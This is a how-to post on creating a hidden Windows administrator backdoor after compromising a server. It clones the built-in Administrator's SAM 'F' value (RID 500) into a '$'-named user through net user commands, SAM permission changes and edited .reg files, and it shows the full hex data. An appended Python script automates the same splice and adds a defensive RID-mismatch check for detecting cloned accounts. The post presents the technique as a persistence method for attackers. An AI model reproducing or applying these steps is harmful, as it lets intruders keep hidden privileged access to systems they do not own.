A word up front: a user created this way will show up in Computer Management after the machine is rebooted, but it cannot be deleted from there; anyone who understands how it works can, of course, delete it in the registry. Here is the method, since it is a useful way to leave a backdoor once you have taken a server. The idea is to clone the built-in Administrator: the hidden account's F value in the SAM is replaced with Administrator's, so the account carries Administrator's RID (500) even though its own key and user name stay separate.

Preparation first. Create a user named sxitn$ (with the trailing $, the account is not listed by net user) with the password 123456:

net user sxitn$ 123456 /add

Then add sxitn$ to the Administrators group:

net localgroup administrators sxitn$ /add

Next, Start -> Run, type regedt32.exe, and under HKEY_LOCAL_MACHINE\SAM select the SAM subkey. By default only SYSTEM can read this key, which is why this step is needed. Right-click it -> Permissions, and on the Security tab add the Administrators group or the current user, allow Full Control, click Apply and OK, then close. (On Windows 2000 regedit has no permissions editor, hence regedt32; on XP and later regedt32.exe simply opens regedit, where Permissions is on the Edit menu.)

Start -> Run, type regedit to open the registry editor. Go to HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\sxitn$ (the Account subtree holds users; Aliases holds groups). Note the type shown for the (Default) value in the right-hand pane, 0x3ef: that number is the account's RID, stored in the value's type field rather than as data. Export this key as sxitn$.reg. Under Users, find the 000003EF key and export it as 3ef.reg; also export 000001F4 (the built-in Administrator, RID 500 = 0x1F4) as 1f4.reg.

Open 1f4.reg in Notepad and copy the F value:

"F"=hex:02,00,01,00,00,00,00,00,d0,f6,92,be,05,df,c7,01,00,00,00,00,00,00,00,\
  00,80,1c,c5,98,94,2d,c7,01,00,00,00,00,00,00,00,00,10,51,1c,cb,08,df,c7,01,\
  f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,c0,00,01,00,00,00,00,\
  00,00,00,00,00,00,00

Open 3ef.reg in Notepad and paste it over the existing F value there (leave the V value alone). F holds the account's RID as a little-endian DWORD at offset 0x30, which is why f4,01,00,00 (0x1F4 = 500) appears at the start of the third line above; the new account's own F has ef,03,00,00 (0x3EF = 1007) in that position.

Open sxitn$.reg in Notepad and copy:

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\sxitn$]
@=hex(3ef):

and paste it at the end of 3ef.reg. The finished 3ef.reg, with Administrator's F in place of the original, is:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003EF]
"F"=hex:02,00,01,00,00,00,00,00,d0,f6,92,be,05,df,c7,01,00,00,00,00,00,00,00,\
  00,80,1c,c5,98,94,2d,c7,01,00,00,00,00,00,00,00,00,10,51,1c,cb,08,df,c7,01,\
  f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,c0,00,01,00,00,00,00,\
  00,00,00,00,00,00,00
"V"=hex:00,00,00,00,bc,00,00,00,02,00,01,00,bc,00,00,00,0c,00,00,00,00,00,00,\
  00,c8,00,00,00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00,00,00,00,\
  c8,00,00,00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00,00,00,00,c8,\
  00,00,00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00,00,00,00,c8,00,\
  00,00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00,00,00,00,c8,00,00,\
  00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00,00,00,00,c8,00,00,00,\
  08,00,00,00,01,00,00,00,d0,00,00,00,14,00,00,00,00,00,00,00,e4,00,00,00,14,\
  00,00,00,00,00,00,00,f8,00,00,00,04,00,00,00,00,00,00,00,fc,00,00,00,04,00,\
  00,00,00,00,00,00,01,00,14,80,9c,00,00,00,ac,00,00,00,14,00,00,00,44,00,00,\
  00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,\
  00,00,00,00,02,c0,14,00,ff,07,0f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,\
  00,58,00,03,00,00,00,00,00,24,00,44,00,02,00,01,05,00,00,00,00,00,05,15,00,\
  00,00,5b,84,10,ab,37,d9,e9,d7,09,61,8b,28,ef,03,00,00,00,00,18,00,ff,07,0f,\
  00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,5b,03,02,00,\
  01,01,00,00,00,00,00,01,00,00,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,\
  02,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,73,00,78,00,69,00,\
  74,00,6e,00,24,00,01,02,00,00,07,00,00,00,01,00,01,00,c5,3d,41,62,8b,c0,6f,\
  1e,57,d2,4c,dc,4e,20,76,a3,01,00,01,00,47,ad,d7,59,3f,ac,4a,a1,f6,dd,c6,d9,\
  bc,1e,8d,15,01,00,01,00,01,00,01,00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\sxitn$]
@=hex(3ef):

Save it. Now delete the user sxitn$ (this removes both the 000003EF key and the Names\sxitn$ entry; the import in the next step recreates both, which is why the Names key was appended to the file):

net user sxitn$ /delete

Then import 3ef.reg (double-click it) into the registry. Finally, open regedt32.exe again and remove the entry you added earlier (Administrators or the current user) from the SAM key's Security tab, then Apply.

The hidden user is now in place. It does not appear in net user; it does show in Computer Management after a reboot but cannot be deleted from there, and because of the cloned F it logs on with Administrator's identity. To remove it later, grant yourself access to SAM\SAM again as above and delete both the 000003EF key and the Names\sxitn$ entry under HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users.
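The following Python script is an added example, not part of the original post or its author's tooling. It parses the .reg listings above (the hex bytes are copied from the post; the V value is omitted because the procedure never touches it), decodes the fields of F that the trick relies on (RID at 0x30, account-control flags at 0x38, and the FILETIMEs at 0x08 and 0x18 per chntpw's published user_F layout), performs the F splice and Names-key append programmatically, and then runs the check a defender would use: a user key whose name RID differs from the RID inside its F. The function names (reg_values, decode_f, build_clone_reg, rid_mismatch, demo) are this example's own.

```python
"""Decode the SAM "F" blob the post copies, splice it the way the post does by
hand, and run the check a defender would use to spot the result."""
import re
import struct
from datetime import datetime, timedelta

# Administrator's F (key 000001F4), copied from the post's 1f4.reg listing.
ADMIN_F_REG = r'''
"F"=hex:02,00,01,00,00,00,00,00,d0,f6,92,be,05,df,c7,01,00,00,00,00,00,00,00,\
  00,80,1c,c5,98,94,2d,c7,01,00,00,00,00,00,00,00,00,10,51,1c,cb,08,df,c7,01,\
  f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,c0,00,01,00,00,00,00,\
  00,00,00,00,00,00,00
'''

# 3ef.reg of the fresh sxitn$ account as exported (copied from the post);
# the V value is left out here because the procedure never changes it.
HIDDEN_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003EF]
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,90,97,6d,19,10,df,c7,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  ef,03,00,00,01,02,00,00,10,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,00,\
  00,95,7c,4e,2e,20,74
'''

# sxitn$.reg: the "type" 3ef of the default value is the RID, not a data type.
NAMES_REG = r'''[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\sxitn$]
@=hex(3ef):
'''

HEX_VALUE_RE = re.compile(r'"(?P<name>[^"]+)"=hex:(?P<data>[0-9a-fA-F, \t]+)')

# Account-control bits at F+0x38 (the subset relevant here).
ACB_FLAGS = {0x0001: "DISABLED", 0x0004: "PWNOTREQ", 0x0010: "NORMAL",
             0x0200: "PWNOEXP", 0x0400: "AUTOLOCK"}


def reg_values(text):
    """Name -> bytes for every REG_BINARY 'hex:' value in a .reg text."""
    joined = text.replace("\\\n", "")          # undo regedit's line continuations
    out = {}
    for m in HEX_VALUE_RE.finditer(joined):
        items = [t.strip() for t in m.group("data").split(",") if t.strip()]
        out[m.group("name")] = bytes(int(t, 16) for t in items)
    return out


def filetime(raw):
    """Windows FILETIME -> datetime, or None for zero (never)."""
    ft = struct.unpack("<Q", raw)[0]
    return datetime(1601, 1, 1) + timedelta(microseconds=ft // 10) if ft else None


def decode_f(f):
    """Fields of the 80-byte F blob; offsets follow chntpw's user_F layout."""
    if len(f) != 0x50:
        raise ValueError(f"F should be 80 bytes, got {len(f)}")
    rid = struct.unpack_from("<I", f, 0x30)[0]
    acb = struct.unpack_from("<H", f, 0x38)[0]
    return {"rid": rid, "acb": acb,
            "flags": [n for bit, n in ACB_FLAGS.items() if acb & bit],
            "last_logon": filetime(f[0x08:0x10]),
            "pwd_last_set": filetime(f[0x18:0x20])}


def build_clone_reg(target_reg, donor_reg, names_reg):
    """Put the donor's F into the target key and append the Names entry, so one
    import recreates both keys after 'net user sxitn$ /delete'."""
    donor_f = reg_values(donor_reg)["F"]
    new_f = '"F"=hex:' + ",".join(f"{b:02x}" for b in donor_f)
    patched, n = re.subn(r'"F"=hex:[0-9a-fA-F, \t]+', new_f,
                         target_reg.replace("\\\n", ""))
    if n != 1:
        raise ValueError("expected exactly one F value in the target .reg")
    return patched.rstrip("\n") + "\n\n" + names_reg


def rid_mismatch(key_path, f):
    """Defender's check: the key name is the account's RID, F carries the RID
    the account will actually use. A clone disagrees between the two."""
    name = key_path.rsplit("\\", 1)[-1]
    f_rid = decode_f(f)["rid"]
    if int(name, 16) == f_rid:
        return None
    return f"user key {name} carries RID {f_rid} (0x{f_rid:x}) in F: cloned account"


def demo():
    """Run the post's steps on the embedded data and return what changed."""
    before = reg_values(HIDDEN_REG)["F"]
    clone = build_clone_reg(HIDDEN_REG, ADMIN_F_REG, NAMES_REG)
    after = reg_values(clone)["F"]
    key = r"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003EF"
    return {"before": decode_f(before), "after": decode_f(after),
            "names_key_appended": NAMES_REG.strip() in clone,
            "alert": rid_mismatch(key, after)}


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Running it shows the 000003EF key going from RID 1007 with flags NORMAL (never logged on) to RID 500 with NORMAL and PWNOEXP, i.e. Administrator's account data under the hidden user's key, and rid_mismatch fires on the result. The same check run over every key under Domains\Account\Users in a SAM export finds a cloned account whatever name it was given, which is the detection a practitioner should expect against this trick.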

Source: original to this site